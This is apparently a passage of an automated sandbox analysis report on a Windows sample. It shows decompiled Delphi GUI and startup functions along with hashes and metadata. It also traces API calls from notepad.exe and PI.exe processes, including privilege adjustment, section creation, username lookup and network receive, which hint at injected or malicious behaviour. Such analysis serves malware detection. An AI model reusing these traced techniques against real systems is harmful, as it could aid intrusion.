					if((_t17 & 0x00000003) != 0 ||  *((intOrPtr*)(_t14 + 8)) > 0 &&  *((intOrPtr*)(_t14 + 0xc)) > 0 && GetSystemMetrics(0) >  *_t14 && GetSystemMetrics(1) >  *((intOrPtr*)(_t14 + 4))) {
						_t19 = 0x12340042;
					}
				} else {
					_t16 =  *0x492aa4; // 0x427304
					 *0x492aa4 = E00427194(2, _t14, _t16, _t17, _t18);
					_t19 =  *0x492aa4(_t14, _t17);
				}
				return _t19;
			}

0x0042730a
0x0042730d
0x00427317
0x0042733c
0x00427345
0x0042736c
0x0042736c
0x00427319
0x0042731e
0x0042732b
0x00427338
0x00427338
0x00427377

APIs

GetSystemMetrics.USER32 ref: 00427355
GetSystemMetrics.USER32 ref: 00427361

Part of subcall function 00427194: GetProcAddress.KERNEL32(745C0000,00000000), ref: 00427214

Strings

MonitorFromRect, xrefs: 00427319

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: MetricsSystem$AddressProc
String ID: MonitorFromRect
API String ID: 1792783759-4033241945
Opcode ID: f76343267f8f6e76762aad9361421a78a08c1b4a0823ab219f42e92386d770b8
Instruction ID: 2301f00ec9ba7264bd122406a49eefa55d1318e51faeaa851ac3d724eb161a96
Opcode Fuzzy Hash: f76343267f8f6e76762aad9361421a78a08c1b4a0823ab219f42e92386d770b8
Instruction Fuzzy Hash: 5F018F37308124AFDB20CB56EA85B26B755EB90354F9480A3EC04CB716C3B8DC40DBA8

Uniqueness

Uniqueness Score: -1.00%

Function 0043DA78, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E0043DA78(void* __eax, intOrPtr __ecx, intOrPtr __edx, void* __eflags, char _a4) {
				intOrPtr _v8;
				char _v12;
				char _v16;
				void* _t22;
				void* _t28;

				_v8 = __ecx;
				_t28 = __eax;
				_t22 = 0;
				if(E004428C8(__eax) != 0) {
					_t32 = __edx -  *((intOrPtr*)(_t28 + 0x6c));
					if(__edx !=  *((intOrPtr*)(_t28 + 0x6c))) {
						E0043DADC(_t28, _t32);
						 *((intOrPtr*)(_t28 + 0x6c)) = __edx;
						_t5 =  &_a4; // 0x433c30
						E0043D868(__edx,  *_t5, _v8,  &_v16);
						_t7 =  &_v12; // 0x433c30
						_push( *_t7);
						_push(_v16);
						_push( *((intOrPtr*)(_t28 + 0x6c)));
						L00426A84();
						asm("sbb ebx, ebx");
						_t22 = __edx + 1;
					}
				}
				return _t22;
			}

0x0043da81
0x0043da86
0x0043da88
0x0043da93
0x0043da95
0x0043da98
0x0043da9c
0x0043daa3
0x0043daaa
0x0043dab2
0x0043dab7
0x0043daba
0x0043dabe
0x0043dac2
0x0043dac3
0x0043dacb
0x0043dacd
0x0043dacd
0x0043da98
0x0043dad6

APIs

Part of subcall function 0043DADC: 734518F0.COMCTL32(?,00000000,0043DAA1,00000000,00000000,00000000), ref: 0043DAF4

Part of subcall function 0043D868: ClientToScreen.USER32(?,0043DB24), ref: 0043D880
Part of subcall function 0043D868: GetWindowRect.USER32 ref: 0043D88A

73451850.COMCTL32(?,?,0<C,?,00000000,00000000,00000000), ref: 0043DAC3

Strings

0<C, xrefs: 0043DAB7, 0043DABA
0<C, xrefs: 0043DAAA

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: 73451873451850ClientRectScreenWindow
String ID: 0<C$0<C
API String ID: 1718620977-3472436047
Opcode ID: 00d106f936de75d0ca9e3580eacffe505f31c1e9111c2a916bad47f52e8b8bc8
Instruction ID: 77f9182041267edf6f7985351eac1890907fc28c30f9b3144ecc59025aa47a15
Opcode Fuzzy Hash: 00d106f936de75d0ca9e3580eacffe505f31c1e9111c2a916bad47f52e8b8bc8
Instruction Fuzzy Hash: 4EF04F72B042086B8710EEDE99C189EF3ACEB4D224B44457AF518D3341D674AE058795

Uniqueness

Uniqueness Score: -1.00%

Function 004260FC, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E004260FC() {
				int _t2;
				struct HDC__* _t5;
				int _t8;
				signed int _t10;
				char _t11;

				_t2 =  *0x492a30; // 0x60
				 *0x4764ec =  ~(MulDiv(8, _t2, 0x48));
				_t5 =  *0x49129c; // 0x4927f0
				if( *((char*)(_t5 + 0xc)) != 0) {
					_t11 = E004260B8(_t5);
					_t5 = _t11 - 0x80;
					if(_t5 == 0) {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t8 =  *0x492a30; // 0x60
						_t10 =  ~(MulDiv(9, _t8, 0x48));
						 *0x4764ec = _t10;
						 *0x4764f2 = _t11;
						return _t10;
					}
				}
				return _t5;
			}

0x00426101
0x00426110
0x00426115
0x0042611e
0x00426125
0x00426129
0x0042612b
0x00426137
0x00426138
0x00426139
0x0042613a
0x0042613d
0x0042614a
0x0042614c
0x00426151
0x00000000
0x00426151
0x0042612b
0x0042615a

APIs

MulDiv.KERNEL32(00000008,00000060,00000048), ref: 00426109

Part of subcall function 004260B8: 72E7AC50.USER32(00000000), ref: 004260C1
Part of subcall function 004260B8: SelectObject.GDI32(00000000,058A00B4), ref: 004260D3
Part of subcall function 004260B8: GetTextMetricsA.GDI32(00000000), ref: 004260DE
Part of subcall function 004260B8: 72E7B380.USER32(00000000,00000000,00000000,058A00B4,00000000), ref: 004260EE

MulDiv.KERNEL32(00000009,00000060,00000048), ref: 00426145

Strings

MS Sans Serif, xrefs: 00426132

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: B380MetricsObjectSelectText
String ID: MS Sans Serif
API String ID: 3841012960-1665085520
Opcode ID: 2cb45da4d2254a0ee0866c64ec343cfeccadc25e4d251b290f8d7bb2f501de4d
Instruction ID: 1fe7725e697bde746ceba59c12cbc2dd289ec34200c7d440687e8b57dcca642f
Opcode Fuzzy Hash: 2cb45da4d2254a0ee0866c64ec343cfeccadc25e4d251b290f8d7bb2f501de4d
Instruction Fuzzy Hash: 7BF090717405145FD361EB6DAC42F662696974B710F46803EB10CDA292C29658048F2C

Uniqueness

Uniqueness Score: -1.00%

Function 00456188, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00456188(int __eax) {
				int _t4;
				int _t11;

				_t4 = __eax;
				_t11 = __eax;
				_t12 =  *((intOrPtr*)(__eax + 0x84));
				if( *((intOrPtr*)(__eax + 0x84)) != 0) {
					_t4 = E0043C4F8(_t12);
					if(_t4 != 0) {
						_t4 = IsWindowVisible(E0043C1F4( *((intOrPtr*)(_t11 + 0x84))));
						if(_t4 != 0) {
							return ShowWindow(E0043C1F4( *((intOrPtr*)(_t11 + 0x84))), 0);
						}
					}
				}
				return _t4;
			}

0x00456188
0x0045618a
0x0045618c
0x00456194
0x00456198
0x0045619f
0x004561ad
0x004561b4
0x00000000
0x004561c4
0x004561b4
0x0045619f
0x004561cb

APIs

IsWindowVisible.USER32(00000000), ref: 004561AD
ShowWindow.USER32(00000000,00000000,?,dZG,004561DC,00000000,004552C7,?,?,dZG,00000001,00455387,?,?,?,dZG), ref: 004561C4

Strings

dZG, xrefs: 00456188

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$ShowVisible
String ID: dZG
API String ID: 4185057100-410245891
Opcode ID: e7b5841ee6f6c1e4db26ffb880ef901477c0ab628b67a40c463d79075b649659
Instruction ID: d8f9f2cca3db28591ab6c68512187d621f030eca5fe2269429791bb322129600
Opcode Fuzzy Hash: e7b5841ee6f6c1e4db26ffb880ef901477c0ab628b67a40c463d79075b649659
Instruction Fuzzy Hash: A9E0867170051147DE107A664DC2BAB13485F04709F0515BFBD04FF247CE2C9C0857B8

Uniqueness

Uniqueness Score: -1.00%

Function 00445904, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00445904(void* __eax) {
				void* _t16;
				intOrPtr _t17;

				_t16 = __eax;
				if( *((intOrPtr*)(__eax + 0x34)) == 0) {
					_t17 =  *0x4445d8; // 0x444624
					if(E00403768( *((intOrPtr*)(__eax + 4)), _t17) == 0) {
						 *((intOrPtr*)(_t16 + 0x34)) = CreateMenu();
					} else {
						 *((intOrPtr*)(_t16 + 0x34)) = CreatePopupMenu();
					}
					if( *((intOrPtr*)(_t16 + 0x34)) == 0) {
						E004449B8();
					}
					E004456A0(_t16);
				}
				return  *((intOrPtr*)(_t16 + 0x34));
			}

0x00445905
0x0044590b
0x00445910
0x0044591d
0x0044592e
0x0044591f
0x00445924
0x00445924
0x00445935
0x0044593c
0x0044593c
0x00445943
0x00445943
0x0044594c

APIs

CreatePopupMenu.USER32(?,00445617,00000000,00000000,0044565B), ref: 0044591F
CreateMenu.USER32(?,00445617,00000000,00000000,0044565B), ref: 00445929

Strings

$FD, xrefs: 00445910

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateMenu$Popup
String ID: $FD
API String ID: 257293969-395794980
Opcode ID: c42990e1ece9b77a869a2c24865aef1475e0a8e19f72d0e0a11d00286e18dabd
Instruction ID: 615b8956163de8ceb6ed4c4d63f0af774e49576ecaa566ce70806b744e89d49a
Opcode Fuzzy Hash: c42990e1ece9b77a869a2c24865aef1475e0a8e19f72d0e0a11d00286e18dabd
Instruction Fuzzy Hash: 0DE0C9B0606600CBDF50EF35D6C17053BA8AF49325F81647BA8419B35BC678DC909718

Uniqueness

Uniqueness Score: -1.00%

Function 004065F5, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21
threadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004065F5(void* __eax, void* __ebx, void* __esi) {
				long _t10;

				 *((intOrPtr*)(__ebx + 0x69)) =  *((intOrPtr*)(__ebx + 0x69)) + __esi;
				 *0x476008 = 2;
				 *0x49204a = 2;
				 *0x492000 = E004052D0;
				if(E00403424() != 0) {
					_t5 = E00403454();
				}
				E00403518(_t5);
				 *0x492050 = 0xd7b0;
				 *0x49221c = 0xd7b0;
				 *0x4923e8 = 0xd7b0;
				E004051C8();
				 *0x49203c = GetCommandLineA();
				 *0x492038 = E004013B0();
				_t10 = GetCurrentThreadId();
				 *0x492030 = _t10;
				return _t10;
			}

0x004065fa
0x004065fd
0x00406604
0x0040660b
0x0040661c
0x0040661e
0x0040661e
0x00406623
0x00406628
0x00406631
0x0040663a
0x00406643
0x0040664d
0x00406657
0x0040665c
0x00406661
0x00406666

APIs

Part of subcall function 00403424: GetKeyboardType.USER32(00000000), ref: 00403429
Part of subcall function 00403424: GetKeyboardType.USER32(00000001), ref: 00403435

GetCommandLineA.KERNEL32 ref: 00406648
GetCurrentThreadId.KERNEL32 ref: 0040665C

Part of subcall function 00403454: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00403476
Part of subcall function 00403454: RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,004034C5,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 004034A9
Part of subcall function 00403454: RegCloseKey.ADVAPI32(?,004034CC,00000000,?,00000004,00000000,004034C5,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 004034BF

Strings

h3P, xrefs: 0040664D

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: KeyboardType$CloseCommandCurrentLineOpenQueryThreadValue
String ID: h3P
API String ID: 3316616684-646281038
Opcode ID: 56c6e909325c70cd11ad151eff35aecf9e6bda53e31f071cf4ccc768fb0614b0
Instruction ID: f85c887000639c39bbf2d6e02aa4c25035bb1959f36ddebc80d248bb8db5abf9
Opcode Fuzzy Hash: 56c6e909325c70cd11ad151eff35aecf9e6bda53e31f071cf4ccc768fb0614b0
Instruction Fuzzy Hash: 4BF0A260811741B9E700FF665A8A20A3F61AF22349B40457FA5407A3B3EBFD4155CB9E

Uniqueness

Uniqueness Score: -1.00%

Function 00433938, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E00433938(struct tagPOINT* __eax) {
				struct HWND__* _t8;
				void* _t9;

				_push(__eax->y);
				_t8 = WindowFromPoint( *__eax);
				if(_t8 != 0) {
					while(E004338F0(_t8, _t9) == 0) {
						_t8 = GetParent(_t8);
						if(_t8 != 0) {
							continue;
						}
						goto L3;
					}
				}
				L3:
				return _t8;
			}

0x00433939
0x00433943
0x00433947
0x00433949
0x0043395a
0x0043395e
0x00000000
0x00000000
0x00000000
0x0043395e
0x00433949
0x00433960
0x00433963

APIs

WindowFromPoint.USER32(!8C,?,00000000,0043351A,?,-0000000C,?), ref: 0043393E

Part of subcall function 004338F0: GlobalFindAtomA.KERNEL32 ref: 00433904
Part of subcall function 004338F0: GetPropA.USER32 ref: 0043391B

GetParent.USER32(00000000), ref: 00433955

Strings

!8C, xrefs: 0043393C

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: AtomFindFromGlobalParentPointPropWindow
String ID: !8C
API String ID: 3524704154-1048860948
Opcode ID: 717da5122212638534d5f3e45181042c5750e76ed7600246d49431436172db62
Instruction ID: 4c313ab1c757ff2f6f8bd9fc01bff25691d4aec51474bd066117046bba4851c4
Opcode Fuzzy Hash: 717da5122212638534d5f3e45181042c5750e76ed7600246d49431436172db62
Instruction Fuzzy Hash: 7AD09EA13093069AAB113EEA5CC161625895F18619B01207F76456A313DBADDD18121D

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: notepad.exe PID: 1476 Parent PID: 6512 notepad.exeCOMMON

Executed Functions

Function 032305C0, Relevance: 3.1, APIs: 2, Instructions: 105sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 0323037F: VirtualAlloc.KERNELBASE(00000000,00000084,00003000,00000004), ref: 032303BC

Sleep.KERNELBASE(00000064), ref: 0323060C
ExitProcess.KERNEL32(00000000), ref: 032306BF

Memory Dump Source

Source File: 00000001.00000002.677963771.0000000003230000.00000040.00000001.sdmp, Offset: 03230000, based on PE: false

Similarity

API ID: AllocExitProcessSleepVirtual
String ID:
API String ID: 2983915161-0
Opcode ID: 16b5f2dbb43a678d78793ed32a68b45f0ed3ba70615e801ff6e9593ac591fdd7
Instruction ID: b56ab4a2b4e78b70ae8f872d7e563142af3f348d9df7e3e59bad6fae31f20491
Opcode Fuzzy Hash: 16b5f2dbb43a678d78793ed32a68b45f0ed3ba70615e801ff6e9593ac591fdd7
Instruction Fuzzy Hash: B2315EB1550605AFCB119FA58C88EAFBBBDEF86B00F148469FA479A005E6719581CB70

Uniqueness

Uniqueness Score: -1.00%

Function 0323037F, Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 177memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,00000084,00003000,00000004), ref: 032303BC

Strings

32, xrefs: 03230561
l32, xrefs: 03230525
shel, xrefs: 0323051E
user, xrefs: 0323055A

Memory Dump Source

Source File: 00000001.00000002.677963771.0000000003230000.00000040.00000001.sdmp, Offset: 03230000, based on PE: false

Similarity

API ID: AllocVirtual
String ID: 32$l32$shel$user
API String ID: 4275171209-2982339341
Opcode ID: b74b33cbb7bbbcef33c71033a1d47444249694d59b42bad6426b3f9228879d7e
Instruction ID: 9e08d4de01998829a6fed06529ffd92122ea07d3b39535446ca789c66a4ea0ee
Opcode Fuzzy Hash: b74b33cbb7bbbcef33c71033a1d47444249694d59b42bad6426b3f9228879d7e
Instruction Fuzzy Hash: F35134F5C11758AAC730EFBA8D44E5FFAFAEF52900710891EE147A7610E6F5E1808A70

Uniqueness

Uniqueness Score: -1.00%

Function 032300F0, Relevance: 6.0, APIs: 4, Instructions: 42fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,40000000,00000002,00000000,00000002,00000000,00000000), ref: 03230107
SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000), ref: 0323011C
WriteFile.KERNELBASE(00000000,?,?,?,00000000), ref: 0323012C
FindCloseChangeNotification.KERNELBASE(00000000), ref: 03230130

Memory Dump Source

Source File: 00000001.00000002.677963771.0000000003230000.00000040.00000001.sdmp, Offset: 03230000, based on PE: false

Similarity

API ID: File$ChangeCloseCreateFindNotificationPointerWrite
String ID:
API String ID: 175865374-0
Opcode ID: 4024a376ceff9ed47b54a7def8bf7473c201f9a5c23eb18287394f43d9810850
Instruction ID: ae8dc178889a30fe3e714dfd8511de0b69adea55fcd60e816d5390427c165b56
Opcode Fuzzy Hash: 4024a376ceff9ed47b54a7def8bf7473c201f9a5c23eb18287394f43d9810850
Instruction Fuzzy Hash: B2F017B2110248BBDB205AB68D8DE5BBABCEBCAB20F108919B61292080D670A901D630

Uniqueness

Uniqueness Score: -1.00%

Function 03230152, Relevance: 1.6, APIs: 1, Instructions: 64fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNELBASE(?), ref: 032301DE

Part of subcall function 032300F0: CreateFileW.KERNELBASE(?,40000000,00000002,00000000,00000002,00000000,00000000), ref: 03230107

Memory Dump Source

Source File: 00000001.00000002.677963771.0000000003230000.00000040.00000001.sdmp, Offset: 03230000, based on PE: false

Similarity

API ID: File$CreateDelete
String ID:
API String ID: 1264090339-0
Opcode ID: 5065c725befc3627d9c41e4f8815f6a946d21cdad38cdc632242ad138c8ed2ef
Instruction ID: f0f8f884639d23b9d8a3a020f27483d7c80bbd7b31930c21865420b5bec7ed31
Opcode Fuzzy Hash: 5065c725befc3627d9c41e4f8815f6a946d21cdad38cdc632242ad138c8ed2ef
Instruction Fuzzy Hash: 5F115E7696031CABEF11DBB0DC05EEF73BCAF04700F009896E519EB150E6709B858BA5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: PI.exe PID: 5152 Parent PID: 6512 PI.exeCOMMON

Executed Functions

Function 04E33468, Relevance: 8.4, APIs: 1, Strings: 3, Instructions: 1394COMMON

Download Yara Rule

Strings

:@fq, xrefs: 04E36D41
:@fq, xrefs: 04E368AB
:@fq, xrefs: 04E36422

Memory Dump Source

Source File: 00000002.00000002.944034451.0000000004E20000.00000040.00000001.sdmp, Offset: 04E20000, based on PE: false

Similarity

API ID:
String ID: :@fq$:@fq$:@fq
API String ID: 0-3738185570
Opcode ID: a299ffda822e8a2430fab1e91566caf7966ad26d6eceb1ca81762a25cd923c06
Instruction ID: e6be0bfd101d333a0b4ac556bc63dd7667870236a8ed855b48fcb71cc145e043
Opcode Fuzzy Hash: a299ffda822e8a2430fab1e91566caf7966ad26d6eceb1ca81762a25cd923c06
Instruction Fuzzy Hash: F2E2FAB4A002299FDB65DF28C954B99B7F2FB89311F1081EAD809E7354DB35AE91CF40

Uniqueness

Uniqueness Score: -1.00%

Function 04E39378, Relevance: 1.8, APIs: 1, Instructions: 299libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04E393CC

Memory Dump Source

Source File: 00000002.00000002.944034451.0000000004E20000.00000040.00000001.sdmp, Offset: 04E20000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 09bde84f8414a33dfbe63e961afacd51fa7af8555d5368602666349c6861df23
Instruction ID: 61bea7f4faf56aa8c9e88b85223f6cd80828bc059419d628930804d4be1454ca
Opcode Fuzzy Hash: 09bde84f8414a33dfbe63e961afacd51fa7af8555d5368602666349c6861df23
Instruction Fuzzy Hash: 50C18A70F10209CFDB19DF64C5986AEBBF2AF84316F159429D406AB395DB74ED81CB80

Uniqueness

Uniqueness Score: -1.00%

Function 04E39388, Relevance: 1.8, APIs: 1, Instructions: 295libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04E393CC

Memory Dump Source

Source File: 00000002.00000002.944034451.0000000004E20000.00000040.00000001.sdmp, Offset: 04E20000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 0481e5eab02a9598697d2239d65ae1d1f37ed531e1ba02dad3255e808e0493da
Instruction ID: f63106ef014c6d7b341656519562ebb610b1c5a948c67fd238d65f1a3a3eee28
Opcode Fuzzy Hash: 0481e5eab02a9598697d2239d65ae1d1f37ed531e1ba02dad3255e808e0493da
Instruction Fuzzy Hash: 42C16D70F10209CFDB15DF68D5986AEBBF2AF84316F159429E006AB395DB74ED81CB40

Uniqueness

Uniqueness Score: -1.00%

Function 0233B1AF, Relevance: 1.6, APIs: 1, Instructions: 75COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 0233B22F

Memory Dump Source

Source File: 00000002.00000002.942535719.000000000233A000.00000040.00000001.sdmp, Offset: 0233A000, based on PE: false

Similarity

API ID: AdjustPrivilegesToken
String ID:
API String ID: 2874748243-0
Opcode ID: 987b6a3e65f30156076fb57d89965944c2dc3cc64166c03a14d9855be6dd61b9
Instruction ID: c31d60475400a6add25c40d543196343284ba0693f0d678d2d704f2a1e941391
Opcode Fuzzy Hash: 987b6a3e65f30156076fb57d89965944c2dc3cc64166c03a14d9855be6dd61b9
Instruction Fuzzy Hash: 5B21BC765093809FEB23CF25DC41B52BFB4EF06214F0985AAE9858F163D370A908DB62

Uniqueness

Uniqueness Score: -1.00%

Function 0233B331, Relevance: 1.6, APIs: 1, Instructions: 57nativeCOMMON

Download Yara Rule

APIs

NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 0233B39D

Memory Dump Source

Source File: 00000002.00000002.942535719.000000000233A000.00000040.00000001.sdmp, Offset: 0233A000, based on PE: false

Similarity

API ID: InformationQuerySystem
String ID:
API String ID: 3562636166-0
Opcode ID: 672078ce865bb776890c3c739af053d2255434814e7b7c422d2a45fdf3700574
Instruction ID: a7bc483481365ad93bf63b6213726a008b1752e2aa83158dc6ea813fd9a42549
Opcode Fuzzy Hash: 672078ce865bb776890c3c739af053d2255434814e7b7c422d2a45fdf3700574
Instruction Fuzzy Hash: EC118B725093C09FDB23CB25DC45A52FFB4EF06324F0984DAE9848F263D275A908DB62

Uniqueness

Uniqueness Score: -1.00%

Function 0233B1E6, Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 0233B22F

Memory Dump Source

Source File: 00000002.00000002.942535719.000000000233A000.00000040.00000001.sdmp, Offset: 0233A000, based on PE: false

Similarity

API ID: AdjustPrivilegesToken
String ID:
API String ID: 2874748243-0
Opcode ID: 0e54935313ce2333c1472a9a4e3a9b2cac8e0e59cb89967815d078dbcfcebb56
Instruction ID: ef06c16b821ffe17ec161a5f9a036f7ef1cb869cf095edec0f914dbb6c59d753
Opcode Fuzzy Hash: 0e54935313ce2333c1472a9a4e3a9b2cac8e0e59cb89967815d078dbcfcebb56
Instruction Fuzzy Hash: A011A0756003009FDB21CF55D885B66FBE4FF04224F08856AED45CBA52D375E504DB61

Uniqueness

Uniqueness Score: -1.00%

Function 0233A502, Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,00000E94,?,?), ref: 0233A552

Memory Dump Source

Source File: 00000002.00000002.942535719.000000000233A000.00000040.00000001.sdmp, Offset: 0233A000, based on PE: false

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: 9e43a5f4d235ee6f245fd139e69e9c0dde26738e7afd0f92623233528836c6c8
Instruction ID: c07dadc8be0757568a4815047a3d7486cb92fc0b8b5560b1a289cf6ced79260e
Opcode Fuzzy Hash: 9e43a5f4d235ee6f245fd139e69e9c0dde26738e7afd0f92623233528836c6c8
Instruction Fuzzy Hash: 2301A271500600ABD214DF1ADC82B26FBE8FB89B20F148159ED084B741D271F916CAE5

Uniqueness

Uniqueness Score: -1.00%

Function 0233A186, Relevance: 1.5, APIs: 1, Instructions: 42networkCOMMON

Download Yara Rule

APIs

recv.WS2_32(?,?,?,?), ref: 0233A1C1

Memory Dump Source

Source File: 00000002.00000002.942535719.000000000233A000.00000040.00000001.sdmp, Offset: 0233A000, based on PE: false

Similarity

API ID: recv
String ID:
API String ID: 1507349165-0
Opcode ID: 16578a313bf4ae95fe2432f28d7f69b6baface3f4c2310f529df962b139428a4
Instruction ID: c953de85500bd8d04eeed837f3fc82ff44a17bc9fe98a8bf3d3a02689ff840ba
Opcode Fuzzy Hash: 16578a313bf4ae95fe2432f28d7f69b6baface3f4c2310f529df962b139428a4
Instruction Fuzzy Hash: 1001BC71904340DFEB21CF59D885B62FBA4EF04720F0885AADD898BA16D375A509CBB2

Uniqueness

Uniqueness Score: -1.00%

Function 0046E159, Relevance: 1.5, APIs: 1, Instructions: 38nativeCOMMON

Download Yara Rule

APIs

NtCreateSection.NTDLL(?,?,?,?,?,?,?), ref: 0046E186

Memory Dump Source

Source File: 00000002.00000002.941861052.0000000000467000.00000040.00000001.sdmp, Offset: 00467000, based on PE: false

Similarity

API ID: CreateSection
String ID:
API String ID: 2449625523-0
Opcode ID: a37a46fbc0aa0757ed9107e829a7246d8192e0107aaec4b528bfb504aec4bdb0
Instruction ID: b22feb6fc230cc9b851083def6702989d5bbe34457855387048fef1852bfecab
Opcode Fuzzy Hash: a37a46fbc0aa0757ed9107e829a7246d8192e0107aaec4b528bfb504aec4bdb0
Instruction Fuzzy Hash: ACF06836600119ABCF119F5ADC00CDB3FB5FB4A361B044426FA19D3261DB35D951EB99

Uniqueness

Uniqueness Score: -1.00%

Function 0233B362, Relevance: 1.5, APIs: 1, Instructions: 38nativeCOMMON

Download Yara Rule

APIs

NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 0233B39D

Memory Dump Source

Source File: 00000002.00000002.942535719.000000000233A000.00000040.00000001.sdmp, Offset: 0233A000, based on PE: false

Similarity

API ID: InformationQuerySystem
String ID:
API String ID: 3562636166-0
